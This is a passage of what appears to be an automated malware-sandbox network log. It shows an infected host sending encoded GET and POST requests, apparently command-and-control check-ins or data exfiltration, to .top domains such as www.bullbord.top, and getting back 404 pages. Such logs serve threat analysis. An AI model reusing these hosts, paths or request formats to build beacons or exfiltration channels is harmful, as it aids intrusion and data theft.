                                                Data Ascii: akuXxP5CwtfZ5pp9Io25IlGsz8Dkl9ciEHPWGy3JbJxiiq3t4+K5vwzsO0R1EmWivdzCtcVPl8ZEmjdKaxkLNsfoRbPqupmEmNw9z9RAZskILlFJf6ZxfzvdNypyIKgHYV6SsOsLgzJ3q+eOh9/rm2dSFHuozlxwXSid/ASLxvw2SPhJjpmyByWZ1zWxrw8B1lqQzB3dfjgYcekAHpFXrle3pA4tGJ8f1E6EnSYSj/Pc7I5deED
                                                Aug 27, 2024 08:04:35.410626888 CEST2578OUTData Raw: 4e 4c 34 4b 2b 59 4e 75 42 45 78 34 6b 71 7a 65 32 4e 35 58 51 2b 47 66 34 33 41 63 44 2b 58 44 53 42 74 4c 33 44 63 34 68 72 76 6b 53 6f 4a 34 56 62 78 4f 2b 50 34 39 38 64 4f 6e 70 30 49 58 69 76 35 63 6a 4e 66 75 43 71 4f 61 42 36 65 43 37 42
                                                Data Ascii: NL4K+YNuBEx4kqze2N5XQ+Gf43AcD+XDSBtL3Dc4hrvkSoJ4VbxO+P498dOnp0IXiv5cjNfuCqOaB6eC7BZNYlsI7tLFP7AnBbfApireb6baH6DNwyKh2OsWnSIpIHoFmYeJg8lM60DtvDYYVIDs4NYgQ/d1U4e1aV3oCPB271+NIMixAWhjoVSytGpco2YN2Tfw1SSZtLSc+754Uoal7kHw062Yt0TgVB4n3TDdytgTmC6ixvM
                                                Aug 27, 2024 08:04:35.410795927 CEST9023OUTData Raw: 6e 73 46 36 6c 49 49 2b 34 69 42 6a 6b 46 6b 44 4b 65 6f 55 51 59 53 6f 6a 51 48 44 59 67 63 58 68 45 33 55 6b 4a 46 37 79 4d 75 46 49 38 46 77 59 47 4d 53 6e 5a 75 76 66 32 2f 34 68 4e 77 36 74 7a 6b 67 63 32 32 4e 50 32 4e 53 72 54 4a 67 4a 35
                                                Data Ascii: nsF6lII+4iBjkFkDKeoUQYSojQHDYgcXhE3UkJF7yMuFI8FwYGMSnZuvf2/4hNw6tzkgc22NP2NSrTJgJ5ZwLKsAp01NLnS6G8KjQuZZYXS6NHag5aB9LJHRe9Wb9aWtXchnD6lWbOLiX8Ar80TswD8jMbfKUI8klqTiCxRESnQDVZm3oIS5KUqtvsN6S5V0BokswtsNWqw3aU+/PdpVW1kOygrmObXtpZCh/ywjFPGQbRGAW+V
                                                Aug 27, 2024 08:04:35.410962105 CEST3280OUTData Raw: 50 64 76 79 72 4f 6e 76 47 5a 53 6e 35 51 46 79 41 78 46 5a 45 66 62 67 71 56 4e 50 42 75 73 44 41 4a 6a 42 6c 52 53 62 2b 35 4e 31 44 2f 44 4c 2f 45 55 63 76 68 58 55 4d 4f 55 5a 42 70 73 77 57 42 75 67 57 76 42 6a 4f 70 52 67 53 41 57 58 70 38
                                                Data Ascii: PdvyrOnvGZSn5QFyAxFZEfbgqVNPBusDAJjBlRSb+5N1D/DL/EUcvhXUMOUZBpswWBugWvBjOpRgSAWXp88Wwrl+sVApq2iIleG5QqX/IOpuLutFdFEOECltR9Fd/OTAsXwMkM2fip6k0vlQO8ns0CqHrAxPunh+hHk38OqmKL8f8EcQix3yTfdzlAeWDyUeLugGhRY19M56k+ke3WZgj5WDIe6TMa+owlcIWzyKO3K+v03dOTO
                                                Aug 27, 2024 08:04:35.594274044 CEST1289INHTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 06:04:35 GMT
                                                Server: Apache
                                                Content-Length: 16052
                                                Connection: close
                                                Content-Type: text/html
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                Aug 27, 2024 08:04:35.594376087 CEST1289INData Raw: 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20
                                                Data Ascii: 14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                77192.168.11.2049919203.161.46.20580
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:04:37.776644945 CEST546OUTGET /veti/?ij60MtY=CTwFRHkEL7GCscIqZBh2ghsqK7sG3QtVuFrIQG0IMtDLIws7wIuLhg5F5RICghophROLKQKALEwFGf2MtTv3MXBKvDNA89h+ifbsdhYGPDKJkkgMD8vmo5o=&wXB=brv4Erb HTTP/1.1
                                                Host: www.bullbord.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:04:37.945152998 CEST1289INHTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 06:04:37 GMT
                                                Server: Apache
                                                Content-Length: 16052
                                                Connection: close
                                                Content-Type: text/html; charset=utf-8
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                Aug 27, 2024 08:04:37.945256948 CEST1289INData Raw: 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20
                                                Data Ascii: "translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1
                                                Aug 27, 2024 08:04:37.945271015 CEST1289INData Raw: 39 39 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32
                                                Data Ascii: 99 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.00
                                                Aug 27, 2024 08:04:37.945394039 CEST1289INData Raw: 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22
                                                Data Ascii: roke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -
                                                Aug 27, 2024 08:04:37.945421934 CEST1289INData Raw: 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e
                                                Data Ascii: ay:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14
                                                Aug 27, 2024 08:04:37.945492029 CEST1289INData Raw: 32 33 2e 36 36 32 34 38 20 63 20 36 2e 31 35 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37
                                                Data Ascii: 23.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.5322
                                                Aug 27, 2024 08:04:37.945604086 CEST1289INData Raw: 34 31 32 34 38 32 2c 31 39 2e 34 34 35 38 35 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69
                                                Data Ascii: 412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545"
                                                Aug 27, 2024 08:04:37.945635080 CEST1289INData Raw: 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39
                                                Data Ascii: 6" d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.
                                                Aug 27, 2024 08:04:37.945831060 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66
                                                Data Ascii: id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse
                                                Aug 27, 2024 08:04:37.945844889 CEST1289INData Raw: 30 2e 31 33 30 31 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a
                                                Data Ascii: 0.1301 z" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170
                                                Aug 27, 2024 08:04:38.109497070 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a
                                                Data Ascii: transform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.3694


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                78192.168.11.204992018.183.3.4580
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:04:43.390801907 CEST832OUTPOST /y82c/ HTTP/1.1
                                                Host: www.cannulafactory.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.cannulafactory.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.cannulafactory.top/y82c/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 68 4a 4b 35 59 31 70 36 7a 72 79 63 63 47 44 56 7a 70 4d 77 69 30 72 45 77 72 7a 51 49 6c 65 62 51 4c 5a 67 38 36 62 7a 2b 6d 77 6b 56 55 37 55 61 32 5a 4b 69 50 77 32 63 44 33 69 59 63 65 6d 55 2b 4a 48 43 31 35 47 68 44 37 57 44 4f 71 61 76 33 73 4f 42 35 39 66 77 68 51 36 6e 31 59 2b 4d 48 31 64 51 32 49 62 47 78 56 58 39 53 33 58 54 74 32 75 31 64 50 32 79 45 55 4d 4b 47 74 65 62 57 79 73 58 4c 69 72 7a 51 59 38 57 62 66 71 44 47 53 62 45 71 58 5a 76 71 49 6a 64 56 45 55 62 77 49 47 69 54 4d 7a 78 47 58 6e 63 2f 4d 72 41 6f 52 4b 78 56 54 69 33 37 56 4b 74 33 6d 4a 47 41 3d 3d
                                                Data Ascii: ij60MtY=hJK5Y1p6zryccGDVzpMwi0rEwrzQIlebQLZg86bz+mwkVU7Ua2ZKiPw2cD3iYcemU+JHC15GhD7WDOqav3sOB59fwhQ6n1Y+MH1dQ2IbGxVX9S3XTt2u1dP2yEUMKGtebWysXLirzQY8WbfqDGSbEqXZvqIjdVEUbwIGiTMzxGXnc/MrAoRKxVTi37VKt3mJGA==
                                                Aug 27, 2024 08:04:43.652978897 CEST1289INHTTP/1.1 404 Not Found
                                                Server: nginx/1.20.1
                                                Date: Tue, 27 Aug 2024 06:04:43 GMT
                                                Content-Type: text/html
                                                Content-Length: 3971
                                                Connection: close
                                                ETag: "6526681e-f83"
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                                Aug 27, 2024 08:04:43.653136969 CEST1289INData Raw: 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35
                                                Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #900; font-size: 1.1em;
                                                Aug 27, 2024 08:04:43.653151989 CEST1289INData Raw: 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 65 62 73 69 74 65 20 41
                                                Data Ascii: is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your website. This
                                                Aug 27, 2024 08:04:43.653176069 CEST277INData Raw: 3d 22 33 32 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 72 65 64 68 61 74 2e 63 6f 6d 2f 22 3e 3c 69 6d 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                Data Ascii: ="32" /></a> <a href="http://www.redhat.com/"><img src="poweredby.png" alt="[ Powered by Red Hat Enterprise Linux ]" width="88" height="31" /></a> </div>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                79192.168.11.204992118.183.3.4580
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:04:46.186429977 CEST1172OUTPOST /y82c/ HTTP/1.1
                                                Host: www.cannulafactory.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.cannulafactory.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.cannulafactory.top/y82c/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 68 4a 4b 35 59 31 70 36 7a 72 79 63 63 6d 54 56 78 49 4d 77 79 6b 72 44 31 72 7a 51 47 46 65 66 51 4c 6c 67 38 2f 69 6f 2b 7a 41 6b 56 32 7a 55 62 30 78 4b 6c 50 77 32 54 6a 33 6e 56 38 65 62 55 2b 31 50 43 30 46 47 68 48 62 57 4e 63 69 61 6e 6e 73 50 56 70 39 63 78 68 51 42 74 56 59 4b 4d 48 4a 33 51 7a 67 62 47 42 35 58 38 51 76 58 46 73 32 76 78 39 50 76 6d 30 55 4e 42 6d 74 51 62 57 75 6b 58 4a 79 52 30 6c 59 38 56 36 2f 71 43 47 53 63 4b 61 57 54 74 71 4a 55 53 56 46 45 55 79 68 30 76 51 6f 7a 78 31 58 2f 58 59 34 35 43 59 31 6c 78 58 72 6e 2b 34 38 46 72 32 6a 31 5a 45 6f 2f 34 4e 53 4a 7a 5a 6f 6a 55 4f 4a 4b 41 32 37 48 71 73 4b 77 43 68 57 37 61 35 7a 66 70 43 51 57 57 5a 51 4a 37 6d 50 68 45 71 41 6c 34 55 6f 61 59 79 64 47 78 55 42 70 44 57 43 4d 66 50 57 73 31 50 6a 71 34 44 6c 36 45 55 76 37 61 32 53 6f 51 54 57 78 74 31 47 46 68 6b 4e 42 68 76 5a 75 74 34 77 38 2b 54 47 6c 73 43 4c 4b 4e 65 4d 49 6f 54 68 6a 6a 4b 70 49 51 4d 6b 33 34 45 6a 41 49 63 6a 38 51 34 [TRUNCATED]
                                                Data Ascii: ij60MtY=hJK5Y1p6zryccmTVxIMwykrD1rzQGFefQLlg8/io+zAkV2zUb0xKlPw2Tj3nV8ebU+1PC0FGhHbWNciannsPVp9cxhQBtVYKMHJ3QzgbGB5X8QvXFs2vx9Pvm0UNBmtQbWukXJyR0lY8V6/qCGScKaWTtqJUSVFEUyh0vQozx1X/XY45CY1lxXrn+48Fr2j1ZEo/4NSJzZojUOJKA27HqsKwChW7a5zfpCQWWZQJ7mPhEqAl4UoaYydGxUBpDWCMfPWs1Pjq4Dl6EUv7a2SoQTWxt1GFhkNBhvZut4w8+TGlsCLKNeMIoThjjKpIQMk34EjAIcj8Q4rLNuxR1ZHIqmBnjOEnlc34PhCAX/3LG+5CaDhizVapOaanydqTQS2IudCG8wFjjOIBvtkq06Z4BMSh5KoEaieod+mVmSfw1vehpojlP0ZPrQQWQKrLOKefP7AQZShDhi1MKzpoov7g8CYUD301lnmGjgpILdtNVY1qqVfPYLbU2f9v2+BvVPOnWCM9BsSYkgfg7yymfB8raCU=
                                                Aug 27, 2024 08:04:46.449707031 CEST1289INHTTP/1.1 404 Not Found
                                                Server: nginx/1.20.1
                                                Date: Tue, 27 Aug 2024 06:04:46 GMT
                                                Content-Type: text/html
                                                Content-Length: 3971
                                                Connection: close
                                                ETag: "6526681e-f83"
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
